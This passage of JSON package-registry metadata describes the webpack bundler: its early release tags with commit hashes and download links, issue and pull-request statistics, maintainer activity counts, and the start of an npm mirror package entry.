v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-31T08:12:06.292Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/nodePackages.webpack?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":442,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":83,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/nodePackages.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":2390},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-09-02T05:05:06.554Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":925389,"name":"@etec/webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":"etec","versions_count":1,"first_release_published_at":"2021-01-16T04:09:14.417Z","latest_release_published_at":"2021-01-16T04:09:14.417Z","latest_release_number":"0.1.0","last_synced_at":"2026-09-03T00:16:35.840Z","created_at":"2022-04-07T17:03:05.273Z","updated_at":"2026-09-03T00:16:35.840Z","registry_url":"https://www.npmjs.com/package/@etec/webpack","install_command":"npm install @etec/webpack","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"0.1.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79e